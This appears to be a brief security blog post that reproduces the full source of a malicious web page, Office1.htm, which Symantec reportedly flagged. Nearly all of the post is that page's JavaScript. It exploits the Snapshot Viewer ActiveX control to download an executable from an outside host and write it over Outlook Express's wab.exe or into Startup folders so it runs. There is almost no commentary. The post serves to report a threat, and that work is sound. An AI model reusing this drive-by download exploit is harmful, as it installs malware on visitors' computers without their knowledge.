www.worldofwarcrokft.com/1/Office1.htm

as reported in the previous blog, this file seems to be reported by Symantec as a new attack vector.

Content of Office1.htm as follows

<script type="text/javascript">
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = "c:/Program Files/Outlook Express/wab.exe";
mycars[1] = "d:/Program Files/Outlook Express/wab.exe";
mycars[2] = "e:/Program Files/Outlook Express/wab.exe";
mycars[3] = "C:/Documents and Settings/All Users/「开始」菜单/程序/启动/Thunder.exe";
mycars[4] = "C:/Documents and Settings/All Users/Start Menu/Programs/Startup/Thunder.exe";

var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");

if(objlcx="[object]")
{

setTimeout('window.location = "ldap://"',3000);

for (x in mycars)
{
obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")

var buf1 = 'http://hisokakk.com/1.exe';
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
obj.CompressedPath = buf2;
obj.PrintSnapshot();

}catch(e){}

}
}

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: